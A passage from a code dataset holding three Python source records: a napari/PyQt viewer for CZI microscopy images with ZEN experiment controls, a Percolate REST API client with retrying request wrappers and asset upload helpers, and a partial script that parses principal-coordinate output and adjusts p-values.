self.mdtable.setHorizontalHeaderLabels(['Parameter', 'Value'])\n header = self.mdtable.horizontalHeader()\n header.setDefaultAlignment(Qt.AlignLeft)\n\n def update_metadata(self, metadata):\n\n # number of rows is set to number of metadata entries\n row_count = len(metadata)\n col_count = 2\n self.mdtable.setColumnCount(col_count)\n self.mdtable.setRowCount(row_count)\n\n row = 0\n\n # update the table with the entries from metadata dictionary\n for key, value in metadata.items():\n newkey = QTableWidgetItem(key)\n self.mdtable.setItem(row, 0, newkey)\n newvalue = QTableWidgetItem(str(value))\n self.mdtable.setItem(row, 1, newvalue)\n row += 1\n\n # fit columns to content\n self.mdtable.resizeColumnsToContents()\n\n def update_style(self):\n\n # define font size and type\n fnt = QFont()\n fnt.setPointSize(11)\n fnt.setBold(True)\n fnt.setFamily('Arial')\n\n # update both header items\n item1 = QtWidgets.QTableWidgetItem('Parameter')\n item1.setForeground(QtGui.QColor(25, 25, 25))\n item1.setFont(fnt)\n self.mdtable.setHorizontalHeaderItem(0, item1)\n\n item2 = QtWidgets.QTableWidgetItem('Value')\n item2.setForeground(QtGui.QColor(25, 25, 25))\n item2.setFont(fnt)\n self.mdtable.setHorizontalHeaderItem(1, item2)\n\n\nclass FileTree(QWidget):\n\n def __init__(self, workdir):\n super(QWidget, self).__init__()\n\n filter = ['*.czi', '*.ome.tiff', '*ome.tif' '*.tiff' '*.tif']\n\n # define the style for the FileTree via s style sheet\n self.setStyleSheet(\"\"\"\n QTreeView::item {\n background-color: rgb(38, 41, 48);\n font-weight: bold;\n }\n\n QTreeView::item::selected {\n background-color: rgb(38, 41, 48);\n color: rgb(0, 255, 0);\n\n }\n\n QTreeView QHeaderView:section {\n background-color: rgb(38, 41, 48);\n color: rgb(255, 255, 255);\n }\n \"\"\")\n\n self.model = QFileSystemModel()\n self.model.setRootPath(workdir)\n self.model.setFilter(QtCore.QDir.AllDirs | QDir.Files | QtCore.QDir.NoDotAndDotDot)\n self.model.setNameFilterDisables(False)\n self.model.setNameFilters(filter)\n\n self.tree = QTreeView()\n self.tree.setModel(self.model)\n self.tree.setRootIndex(self.model.index(workdir))\n self.tree.setAnimated(True)\n self.tree.setIndentation(20)\n self.tree.setSortingEnabled(False)\n header = self.tree.header()\n header.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)\n\n windowLayout = QVBoxLayout()\n windowLayout.addWidget(self.tree)\n self.setLayout(windowLayout)\n\n self.tree.clicked.connect(self.on_treeView_clicked)\n\n @pyqtSlot()\n def on_treeView_clicked(self, index):\n indexItem = self.model.index(index.row(), 0, index.parent())\n filename = self.model.fileName(indexItem)\n filepath = self.model.filePath(indexItem)\n\n # open the file when clicked\n print('Opening ImageFile : ', filepath)\n open_image_stack(filepath)\n\n\nclass OptionsWidget(QWidget):\n\n def __init__(self):\n super(QWidget, self).__init__()\n\n # Create a grid layout instance\n self.grid_opt = QGridLayout()\n self.grid_opt.setSpacing(10)\n self.setLayout(self.grid_opt)\n\n # add checkbox to use Dask Delayed reader to the grid layout\n self.cbox_dask = QCheckBox(\"Use AICSImageIO Dask Reader\", self)\n self.cbox_dask.setChecked(True)\n self.cbox_dask.setStyleSheet(\"font:bold;\"\n \"font-size: 10px;\"\n \"width :14px;\"\n \"height :14px;\"\n )\n self.grid_opt.addWidget(self.cbox_dask, 0, 0)\n\n # add checkbox to open CZI after the experiment execution\n self.cbox_openczi = QCheckBox(\"Open CZI after Acquisition\", self)\n self.cbox_openczi.setChecked(True)\n self.cbox_openczi.setStyleSheet(\"font:bold;\"\n \"font-size: 10px;\"\n \"width :14px;\"\n \"height :14px;\"\n )\n self.grid_opt.addWidget(self.cbox_openczi, 1, 0)\n\n\nclass FileBrowser(QWidget):\n\n def __init__(self, defaultfolder=r'c:\\Zen_Output'):\n super(QWidget, self).__init__()\n self.layout = QHBoxLayout(self)\n self.file_dialog = QFileDialog()\n self.file_dialog.setWindowFlags(Qt.Widget)\n self.file_dialog.setModal(False)\n self.file_dialog.setOption(QFileDialog.DontUseNativeDialog)\n self.file_dialog.setDirectory(defaultfolder)\n\n # remove open and cancel button from widget\n self.buttonBox = self.file_dialog.findChild(QDialogButtonBox, \"buttonBox\")\n self.buttonBox.clear()\n\n # only show the following file types\n self.file_dialog.setNameFilter(\"Images (*.czi *.ome.tiff *ome.tif *.tiff *.tif)\")\n self.layout.addWidget(self.file_dialog)\n self.file_dialog.currentChanged.connect(open_image_stack)\n\n\nclass StartExperiment(QWidget):\n\n def __init__(self, default_cziname='myimage.czi'):\n super(QWidget, self).__init__()\n\n # Create a grid layout instance\n self.grid_exp = QGridLayout()\n self.grid_exp.setSpacing(10)\n self.setLayout(self.grid_exp)\n\n # add widgets to the grid layout\n self.expselect = QComboBox(self)\n self.expselect.addItems(expfiles_short)\n self.expselect.setStyleSheet(\"font: bold;\"\n \"font-size: 10px;\"\n )\n self.grid_exp.addWidget(self.expselect, 0, 0)\n\n self.startexpbutton = QPushButton('Run Experiment')\n self.startexpbutton.setStyleSheet(\"font: bold;\"\n # \"background-color: red;\"\n \"font-size: 10px;\"\n # \"height: 48px;width: 120px;\"\n )\n self.grid_exp.addWidget(self.startexpbutton, 0, 1)\n\n self.namelabel = QLabel(self)\n self.namelabel.setText('Save Experiment result as CZI :')\n self.namelabel.setStyleSheet(\"font: bold;\"\n \"font-size: 10px;\"\n \"\"\n )\n self.grid_exp.addWidget(self.namelabel, 1, 0)\n\n self.nameedit = QLineEdit(self)\n self.nameedit.setText(default_cziname)\n self.nameedit.setFixedWidth(200)\n self.nameedit.setStyleSheet(\"font: bold;\"\n \"font-size: 10px;\"\n )\n self.grid_exp.addWidget(self.nameedit, 1, 1)\n\n # Set the layout on the application's window\n self.startexpbutton.clicked.connect(self.on_click)\n\n @pyqtSlot()\n def on_click(self):\n\n # get name of the selected experiment\n current_exp = self.expselect.currentText()\n print('Selected ZEN Experiment : ', current_exp)\n\n # get the desired savename\n desired_cziname = self.nameedit.text()\n\n # disable the button while the experiment is running\n self.startexpbutton.setEnabled(False)\n self.startexpbutton.setText('Running ...')\n\n # not nice, but this \"redraws\" the button\n # QtCore.QApplication.processEvents()\n QtWidgets.QApplication.processEvents()\n\n # initialize the experiment with parameters\n czexp = ZenExperiment(experiment=current_exp,\n savefolder=savefolder,\n cziname=desired_cziname)\n\n # start the actual experiment\n self.saved_czifilepath = czexp.startexperiment()\n print('Saved CZI : ', self.saved_czifilepath)\n\n # enable the button again when experiment is over\n self.startexpbutton.setEnabled(True)\n self.startexpbutton.setText('Run Experiment')\n\n # not nice, but this \"redraws\" the button\n QtWidgets.QApplication.processEvents()\n\n # option to use Dask Delayed reader\n use_dask = checkboxes.cbox_dask.isChecked()\n print(\"Use Dask Reader : \", use_dask)\n\n # open the just acquired CZI and show it inside napari viewer\n if self.saved_czifilepath is not None:\n open_image_stack(self.saved_czifilepath, use_dask)\n\n\ndef open_image_stack(filepath, use_dask=False):\n \"\"\" Open a file using AICSImageIO and display it using napari\n\n :param path: filepath of the image\n :type path: str\n :param use_dask: use Dask Delayed reader, defaults to False\n :type use_dask: bool, optional\n \"\"\"\n\n if os.path.isfile(filepath):\n\n # remove existing layers from napari\n viewer.layers.select_all()\n viewer.layers.remove_selected()\n\n # get the metadata\n metadata, add_metadata = imf.get_metadata(filepath)\n\n # add the metadata and adapt the table display\n mdbrowser.update_metadata(metadata)\n mdbrowser.update_style()\n\n # get AICSImageIO object\n img = AICSImage(filepath)\n\n if not use_dask:\n stack = img.get_image_data()\n if use_dask:\n stack = img.get_image_dask_data()\n\n # add the image stack to the napari viewer\n show_image_napari(stack, metadata,\n blending='additive',\n gamma=0.85,\n rename_sliders=True)\n\n\ndef show_image_napari(array, metadata,\n blending='additive',\n gamma=0.75,\n rename_sliders=False):\n \"\"\"Show the multidimensional array using the napari viewer\n\n :param array: multidimensional NumPy.Array containing the pixeldata\n :type array: NumPy.Array\n :param metadata: dictionary with CZI or OME-TIFF metadata\n :type metadata: dict\n :param blending: napari viewer option for blending, defaults to 'additive'\n :type blending: str, optional\n :param gamma: napari viewer value for Gamma, defaults to 0.85\n :type gamma: float, optional\n :param rename_sliders: name slider with correct labels, defaults to False\n :type verbose: bool, optional\n \"\"\"\n\n # create scalefcator with all ones\n scalefactors = [1.0] * len(array.shape)\n dimpos = imf.get_dimpositions(metadata['Axes_aics'])\n\n # get the scalefactors from the metadata\n scalef = imf.get_scalefactor(metadata)\n\n # modify the tuple for the scales for napari\n scalefactors[dimpos['Z']] = scalef['zx']\n\n # remove C dimension from scalefactor\n scalefactors_ch = scalefactors.copy()\n del scalefactors_ch[dimpos['C']]\n\n if metadata['SizeC'] > 1:\n # add all channels as layers\n for ch in range(metadata['SizeC']):\n\n try:\n # get the channel name\n chname = metadata['Channels'][ch]\n except KeyError as e:\n print(e)\n # or use CH1 etc. as string for the name\n chname = 'CH' + str(ch + 1)\n\n # cut out channel\n # use dask if array is a dask.array\n if isinstance(array, da.Array):\n print('Extract Channel as Dask.Array')\n channel = array.compute().take(ch, axis=dimpos['C'])\n\n else:\n # use normal numpy if not\n print('Extract Channel as NumPy.Array')\n channel = array.take(ch, axis=dimpos['C'])\n\n # actually show the image array\n print('Adding Channel : ', chname)\n print('Shape Channel : ', ch, channel.shape)\n print('Scaling Factors : ', scalefactors_ch)\n\n # get min-max values for initial scaling\n clim = imf.calc_scaling(channel,\n corr_min=1.0,\n offset_min=0,\n corr_max=0.85,\n offset_max=0)\n\n # add channel to napari viewer\n viewer.add_image(channel,\n name=chname,\n scale=scalefactors_ch,\n contrast_limits=clim,\n blending=blending,\n gamma=gamma)\n\n if metadata['SizeC'] == 1:\n\n # just add one channel as a layer\n try:\n # get the channel name\n chname = metadata['Channels'][0]\n except KeyError:\n # or use CH1 etc. as string for the name\n chname = 'CH' + str(ch + 1)\n\n # actually show the image array\n print('Adding Channel: ', chname)\n print('Scaling Factors: ', scalefactors)\n\n # use dask if array is a dask.array\n if isinstance(array, da.Array):\n print('Extract Channel using Dask.Array')\n array = array.compute()\n\n # get min-max values for initial scaling\n clim = imf.calc_scaling(array)\n\n viewer.add_image(array,\n name=chname,\n scale=scalefactors,\n contrast_limits=clim,\n blending=blending,\n gamma=gamma)\n\n if rename_sliders:\n\n print('Renaming the Sliders based on the Dimension String ....')\n\n if metadata['SizeC'] == 1:\n\n # get the position of dimension entries after removing C dimension\n dimpos_viewer = imf.get_dimpositions(metadata['Axes_aics'])\n\n # get the label of the sliders\n sliders = viewer.dims.axis_labels\n\n # update the labels with the correct dimension strings\n slidernames = ['B', 'S', 'T', 'Z', 'C']\n\n if metadata['SizeC'] > 1:\n\n new_dimstring = metadata['Axes_aics'].replace('C', '')\n\n # get the position of dimension entries after removing C dimension\n dimpos_viewer = imf.get_dimpositions(new_dimstring)\n\n # get the label of the sliders\n # for napari <= 0.4.2 this returns a list\n # and >= 0.4.3 it will return a tuple\n sliders = viewer.dims.axis_labels\n\n # update the labels with the correct dimension strings\n slidernames = ['B', 'S', 'T', 'Z']\n\n for s in slidernames:\n if dimpos_viewer[s] >= 0:\n try:\n # this seems to work for napari <= 0.4.2\n\n # assign the dimension labels\n sliders[dimpos_viewer[s]] = s\n except TypeError:\n # this works for napari >= 0.4.3\n\n # convert to list()\n tmp_sliders = list(sliders)\n\n # assign the dimension labels\n tmp_sliders[dimpos_viewer[s]] = s\n\n # convert back to tuple\n sliders = tuple(tmp_sliders)\n\n # apply the new labels to the viewer\n viewer.dims.axis_labels = sliders\n\n\ndef get_zenfolders(zen_subfolder='Experiment Setups'):\n \"\"\"Get the absolute path for a specific ZEN folder.\n\n :param zen_subfolder: Name of a specific subfolder, defaults to 'Experiment Setups'\n :type zen_subfolder: str, optional\n :return: specific zensubfolder path\n :rtype: str\n \"\"\"\n\n zenfolder = None\n zensubfolder = None\n\n # get the user folder\n userhome = str(Path.home())\n\n # construct the Zen Document folder and check\n zenfolder = os.path.join(userhome, r'Documents\\Carl Zeiss\\ZEN\\Documents')\n\n if os.path.isdir(zenfolder):\n zensubfolder = os.path.join(zenfolder, zen_subfolder)\n if not os.path.isdir(zenfolder):\n print('ZEN Folder: ' + zenfolder + 'not found')\n\n return zensubfolder\n\n\n###########################################################\n\nif __name__ == \"__main__\":\n\n # make sure this location is correct if you specify this\n savefolder = r'C:\\Users\\m1srh\\Documents\\Zen_Output'\n if os.path.isdir(savefolder):\n print('SaveFolder : ', savefolder, 'found.')\n if not os.path.isdir(savefolder):\n print('SaveFolder : ', savefolder, 'not found.')\n\n # specify directly or try to discover folder automatically\n #zenexpfolder = r'c:\\Users\\testuser\\Documents\\Carl Zeiss\\ZEN\\Documents\\Experiment Setups'\n zenexpfolder = get_zenfolders(zen_subfolder='Experiment Setups')\n\n # check if the ZEN experiment folder was found\n if zenexpfolder is not None:\n print('ZEN Experiment Setups Folder : ', zenexpfolder, 'found.')\n # get lists with existing experiment files\n expdocs = ZenDocuments()\n expfiles_long, expfiles_short = expdocs.getfilenames(folder=zenexpfolder,\n pattern='*.czexp')\n\n if zenexpfolder is None:\n expfiles_long = []\n expfiles_short = []\n\n # default for saving an CZI image after acquisition\n default_cziname = 'myimage.czi'\n\n # decide what widget to use - 'tree' or 'dialog'\n fileselect = 'dialog'\n\n # start the main application\n with napari.gui_qt():\n\n # define the parent directory\n # when using the FileTree one cannot navigate to higher levels\n print('Image Directory : ', savefolder)\n\n # create the napari viewer\n viewer = napari.Viewer()\n\n if fileselect == 'tree':\n # add a FileTree widget\n filetree = FileTree(defaultfolder=savefolder)\n fbwidget = viewer.window.add_dock_widget(filetree, name='filebrowser', area='right')\n\n if fileselect == 'dialog':\n # add a FileDialogg widget\n filebrowser = FileBrowser(defaultfolder=savefolder)\n fbwidget = viewer.window.add_dock_widget(filebrowser, name='filebrowser', area='right')\n\n # create the widget elements\n mdbrowser = TableWidget()\n checkboxes = OptionsWidget()\n expselect = StartExperiment(default_cziname=default_cziname)\n\n # add widget to activate the dask delayed reading\n cbwidget = viewer.window.add_dock_widget(checkboxes, name='checkbox', area='bottom')\n\n # add the Table widget for the metadata\n mdwidget = viewer.window.add_dock_widget(mdbrowser, name='mdbrowser', area='right')\n\n # add the Experiment Selector widget\n expwidget = viewer.window.add_dock_widget(expselect, name='expselect', area='bottom')\n","sub_path":"napari_browser_cz.py","file_name":"napari_browser_cz.py","file_ext":"py","file_size_in_byte":20104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"422227784","text":"import json\nimport logging\nimport os\nimport socket\nimport sys\nimport time\nimport unicodedata\nfrom pprint import pprint\nimport requests\nfrom requests.exceptions import HTTPError\nfrom datetime import datetime, timedelta\nfrom dateutil.parser import parse as dt_parse\nfrom google.cloud import bigquery\n\n\nclass PercolateAPIError(BaseException):\n pass\n\n\ndef count_calls(fn):\n def wrapper(*args, **kwargs):\n wrapper.calls += 1\n return fn(*args, **kwargs)\n wrapper.calls = 0\n wrapper.__name__ = fn.__name__\n return wrapper\n\n\ndef relative_insert(path):\n \"\"\"\n Insert a relative path into sys path.\n \"\"\"\n abspath = os.path.abspath(os.path.join(os.path.dirname(__file__), path))\n sys.path.insert(0, abspath)\n\n\nPERC_HEADERS = {'Content-Type': 'application/json'}\nPERCOLATE_BASE_URL = os.environ.get(\n \"PERCOLATE_BASE_URL\") or 'https://percolate.com/api'\n\n\ndef get_user_id_from_api_key(api_key):\n json_data = get_object(api_key, '/v5/me')\n d = json_data['data']\n return get_id_from_uid(d['id'])\n\n\ndef get_all_objects(api_key, url, params=None, page_limit=100):\n \"\"\"\n Wrapper for pagination of Percolate API\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n params -- dictionary of URL encoded parameters\n \"\"\"\n if params is None or not isinstance(params, dict):\n params = {}\n result = []\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n\n completed = False\n while not completed:\n offset = 0\n limit = page_limit\n total = page_limit\n # page through\n while offset < total:\n url_params = {'limit': limit, 'offset': offset}\n url_params.update(params)\n\n json_data = get_object(api_key, url, url_params)\n try:\n total = json_data['pagination']['total']\n except KeyError:\n total = json_data['meta']['total']\n\n if json_data:\n result.extend(json_data['data'])\n\n offset += limit\n if offset >= total:\n completed = True\n return result\n\n\n@count_calls\ndef get_object(api_key, url, params=None):\n \"\"\"\n Wrapper for single object GET of Percolate API (no pagination)\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n params -- dictionary of URL encoded parameters\n \"\"\"\n if not params:\n params = {}\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n api_url = PERCOLATE_BASE_URL + url\n result = None\n url_params = {}\n url_params.update(params)\n\n retry = 0\n while retry < 10:\n try:\n response = requests.get(api_url, params=url_params,\n headers=headers, timeout=60)\n response.raise_for_status()\n result = response.json()\n # urlfetch.set_default_fetch_deadline(60)\n # response = urlfetch.fetch(\n # api_url + urllib.urlencode(url_params),\n # headers=headers, deadline=None\n # )\n # result = json.loads(response.content)\n if response.status_code != 503:\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params, headers))\n raise PercolateAPIError(status_code, result, api_url,\n url_params, headers)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry == 9:\n print(result)\n raise\n time.sleep(1)\n retry += 1\n\n if 'errors' in result:\n raise PercolateAPIError(result, api_url, url_params, headers)\n return result\n\n\n@count_calls\ndef get_asset_download_url(api_key, asset_uid):\n url = 'https://percolate.com/pam/api/v5/asset/{}/download'\n headers = {'Content-Type': 'application/json', 'Authorization': api_key}\n # params = {'disposition': 'inline'}\n params = {}\n response = None\n\n retry = 0\n while retry < 10:\n try:\n response = requests.get(url.format(asset_uid), params=params,\n headers=headers, allow_redirects=False)\n response.raise_for_status()\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params, headers))\n raise PercolateAPIError(\n status_code, asset_uid, headers, params)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry == 9:\n print(response.text)\n raise\n time.sleep(1)\n retry += 1\n\n download_url = response.headers['Location']\n return download_url\n\n\ndef get_id_from_uid(uid):\n \"\"\"\n Returns numeric ID of an object from its unique ID\n Example: license:12345 returns 12345\n\n Keyword Arguments:\n uid -- Unique object ID\n \"\"\"\n return uid.split(':', 1)[1]\n\n\ndef upload_asset(api_key, url, scope_uid, folder_uid='folder:primary'):\n \"\"\"\n Uploads URL asset into Percolate\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- URL of asset to upload\n scope_uid -- UID of the scope of the asset (license, brand, account)\n \"\"\"\n data = {\n 'type': 'url',\n 'destination_id': folder_uid,\n 'scope_id': scope_uid,\n 'ext': {'url': url},\n 'upload_state': 'preparing'\n }\n # Kick off the upload\n result = post_object(api_key, '/v5/upload/', data)\n # Send back the upload UID for polling\n upload_id = result['id']\n asset_uid, is_dupe = _check_asset_upload_status(api_key, upload_id)\n return asset_uid, upload_id, is_dupe\n\n\ndef _check_asset_upload_status(api_key, upload_uid, give_up_seconds=0):\n \"\"\"\n Returns status checks of uploads into Percolate\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n upload_uid -- Upload UID\n give_up_seconds -- seconds to wait for response if not ready\n \"\"\"\n give_up = False\n give_up_at = time.time()\n asset_id = None\n if give_up_seconds > 0:\n give_up = True\n give_up_at = time.time() + give_up_seconds\n status = ''\n is_dupe = False\n while status not in ('ready',):\n # logging.debug(\"Checking status of upload {}...\".format(upload_uid))\n # Poll the endpoint\n response = get_object(api_key, '/v5/upload/' + upload_uid)\n status = response['data']['status']\n if status in ('ready', 'complete', 'duplicate'):\n asset_id = response['data']['asset_id']\n if status == 'duplicate':\n is_dupe = True\n if asset_id is not None:\n break\n elif status == 'error':\n raise PercolateAPIError('Error creating asset from upload.')\n else:\n if give_up and time.time() > give_up_at:\n logging.warning(\"Giving up...\")\n return asset_id, is_dupe\n else:\n logging.debug(\"Asset not ready. Waiting 3 seconds...\")\n time.sleep(3)\n\n logging.debug(\"Upload {} Asset ready: {}\".format(upload_uid, asset_id))\n return asset_id, is_dupe\n\n\n@count_calls\ndef post_object(api_key, url, data=None, verbose=False):\n \"\"\"\n Wrapper for POST Calls of Percolate API\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n data -- dictionary of payload data\n \"\"\"\n if not data:\n data = {}\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n api_url = PERCOLATE_BASE_URL + url\n result = None\n response = None\n\n retry = 0\n while retry < 10:\n try:\n if verbose:\n print(api_url)\n print(json.dumps(data, sort_keys=True, indent=4))\n pprint(headers)\n response = requests.post(api_url, data=json.dumps(data),\n headers=headers, timeout=60)\n result = response.json()\n response.raise_for_status()\n # urlfetch.set_default_fetch_deadline(60)\n # response = urlfetch.fetch(\n # api_url,\n # method='post',\n # headers=headers, deadline=None,\n # payload=json.dumps(data)\n # )\n # result = json.loads(response.content)\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params, headers))\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps(data), headers)\n\n except json.decoder.JSONDecodeError as json_error:\n error_status_code = json_error.response.status_code\n if isinstance(error_status_code, int) and error_status_code == 502:\n continue\n print('JSON error: {}'.format(json_error))\n status_code = response.status_code\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps(data), headers)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry > 0:\n # TODO - Count retries\n # count_calls()\n\n pass\n if retry == 9:\n print(result)\n raise\n time.sleep(1)\n retry += 1\n\n if 'errors' in result:\n print(response.request.body)\n raise PercolateAPIError(result, api_url, data, headers)\n if 'data' in result:\n return result['data']\n return result\n\n\n@count_calls\ndef delete_object(api_key, url):\n \"\"\"\n Wrapper for POST Calls of Percolate API\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n data -- dictionary of payload data\n \"\"\"\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n api_url = PERCOLATE_BASE_URL + url\n result = None\n response = None\n\n retry = 0\n while retry < 10:\n try:\n response = requests.delete(api_url, headers=headers, timeout=60)\n result = response.status_code\n response.raise_for_status()\n # urlfetch.set_default_fetch_deadline(60)\n # response = urlfetch.fetch(\n # api_url,\n # method='post',\n # headers=headers, deadline=None,\n # payload=json.dumps(data)\n # )\n # result = json.loads(response.content)\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params, headers))\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps({}), headers)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry > 0:\n # TODO - Count retries\n # count_calls()\n\n pass\n if retry == 9:\n print(result)\n raise\n time.sleep(1)\n retry += 1\n\n if result != 204:\n print(response.request.body)\n raise PercolateAPIError(result, api_url, headers)\n return True\n\n\n@count_calls\ndef put_object(api_key, url, data=None):\n \"\"\"\n Wrapper for PUT Calls of Percolate API\n\n Keyword Arguments:\n api_key -- API key of the user for authentication\n url -- API endpoint URL without Percolate base\n data -- dictionary of payload data\n \"\"\"\n if not data:\n data = {}\n headers = PERC_HEADERS\n headers['Authorization'] = api_key\n if not url.endswith('?'):\n url = url + '?'\n if not url.startswith('/'):\n url = '/' + url\n api_url = PERCOLATE_BASE_URL + url\n result = None\n\n retry = 0\n while retry < 10:\n try:\n response = requests.put(api_url, data=json.dumps(data),\n headers=headers, timeout=60)\n result = response.json()\n response.raise_for_status()\n # urlfetch.set_default_fetch_deadline(60)\n # response = urlfetch.fetch(\n # api_url,\n # method='put',\n # headers=headers, deadline=None,\n # payload=json.dumps(data)\n # )\n # result = json.loads(response.content)\n break\n except HTTPError as e:\n status_code = e.response.status_code\n if isinstance(status_code, int) and 400 <= status_code < 500:\n if status_code == 429:\n print('RATE MAX HIT')\n time.sleep(60)\n continue\n # print('{}\\n{}\\n{}'.format(e, url_params, headers))\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps(data), headers)\n except json.decoder.JSONDecodeError as json_error:\n print('JSON error: {}'.format(json_error))\n status_code = response.status_code\n raise PercolateAPIError(status_code, result, api_url,\n json.dumps(data), headers)\n except (requests.exceptions.RequestException, ValueError, HTTPError,\n socket.timeout, socket.error) as e:\n logging.error(e)\n logging.error(\"retrying...\")\n if retry == 9:\n print(result)\n raise\n time.sleep(1)\n retry += 1\n\n if 'errors' in result:\n raise PercolateAPIError(result, api_url, data, headers)\n return result\n\n\ndef get_all_files(root_directory, with_dotfiles=False, full_path=False,\n has_file_ext=True):\n all_files = []\n # strip_dir = root_directory.rstrip('/')\n for root, dirs, file_names in os.walk(root_directory):\n if not with_dotfiles:\n file_names = [f for f in file_names if not f[0] == '.']\n dirs[:] = [d for d in dirs if not d[0] == '.']\n for f in file_names:\n result = f\n if not has_file_ext:\n result = os.path.splitext(result)[0]\n if full_path:\n result = os.path.join(root, result)\n all_files.append(unicodedata.normalize('NFC', result))\n return all_files\n\n\ndef get_root_folder_id(api_key, license_uid):\n data = {'ids': 'folder:primary', 'scope_ids': license_uid}\n api_url = '/v5/folder/'\n raw_root_details = get_object(api_key, api_url, data)\n return raw_root_details['data'][0]['id']\n\n\ndef _get_license_timezone(api_key, license_uid):\n url = '/v5/license/{}'.format(license_uid)\n license_obj = get_object(api_key, url)['data']\n return license_obj['timezone']\n\n\ndef update_status(api_key, post_obj, status, url=None, live_at='now'):\n post_id = post_obj['id']\n field_list = ['topic_ids', 'term_ids', 'ext', 'description', 'name',\n 'status']\n new_post_obj = {}\n for field in field_list:\n new_post_obj[field] = post_obj[field]\n\n if live_at == 'now':\n live_at_obj = datetime.utcnow() + timedelta(seconds=5)\n elif live_at is None:\n live_at_obj = None\n elif not isinstance(live_at, datetime):\n live_at_obj = dt_parse(live_at)\n else:\n live_at_obj = live_at\n\n new_post_obj['live_at'] = live_at_obj.strftime('%Y-%m-%dT%H:%M:%S.000Z') \\\n if live_at_obj else None\n if live_at:\n timezone = _get_license_timezone(api_key, post_obj['scope_id'])\n new_post_obj['live_at_timezone'] = timezone\n new_post_obj['status'] = status\n new_post_obj['url'] = url\n api_url = '/v5/post/{}'.format(post_id)\n\n result = put_object(api_key, api_url, data=new_post_obj)\n return result\n\n # pprint(new_post_obj)\n\n","sub_path":"ts_utils.py","file_name":"ts_utils.py","file_ext":"py","file_size_in_byte":17978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"530692821","text":"##import sys\n##print(sys.path)\n## above import is to check where the \"import\" command is looking\nimport pandas as pd\nfrom scipy.stats import spearmanr\nimport argparse\nimport numpy as np\n\n#TODO: implement use with categorical metadata labels\n#TODO: for continuous data allow pearson correlation/use correl_method arg\n#TODO: for continuous data sort correls\n\ndef read_pc(pc_fp, min_percent_explained):\n f = open(pc_fp)\n f = f.readlines()\n f = [i.strip().split('\\t') for i in f]\n\n eig_index = -1\n eigvals = None\n percent_explained_line = -1\n percent_explained = None\n pc_start = -1\n pc_end = -1\n pcs = None\n for index, line in enumerate(f):\n if line == ['']:\n continue\n elif line[0] == \"Eigvals\":\n eig_index = index + 1\n elif index == eig_index:\n eigvals = line\n elif line[0] == \"Proportion explained\":\n percent_explained_line = index + 1\n elif index == percent_explained_line:\n percent_explained = [float(i) for i in line]\n elif line[0] == \"Site\":\n pc_start = index + 1\n pc_end = pc_start + int(line[1])\n pcs = pd.DataFrame(dtype=float)\n elif index >= pc_start and index < pc_end:\n pcs[line[0]] = [float(i) for i in line[1:]]\n else:\n continue\n pcs = pcs.transpose()\n\n # get rid of zeroes\n not_zeroes = pcs.columns[pcs.sum() != 0]\n pcs = pcs[not_zeroes]\n percent_explained = percent_explained[:len(not_zeroes)]\n\n # filter by percent explained\n last_percent_explained = None\n for index, value in enumerate(percent_explained):\n if value < .001:\n last_percent_explained = index-1\n break\n percent_explained = percent_explained[:last_percent_explained]\n pcs = pcs[pcs.columns[:last_percent_explained]]\n pcs.columns = [\"PC\"+str(i+1) for i in pcs.columns]\n\n return pcs\n\n\ndef bh_adjust(pvalues):\n \"\"\"benjamini-hochberg p-value adjustment stolen from\n http://stackoverflow.com/questions/7450957/how-to-implement-rs-p-adjust-in-python\n \"\"\"\n pvalues = np.array(pvalues)\n n = float(pvalues.shape[0])\n new_pvalues = np.empty(int(n))\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n values.sort()\n values.reverse()\n new_values = []\n for i, vals in enumerate(values):\n rank = n - i\n 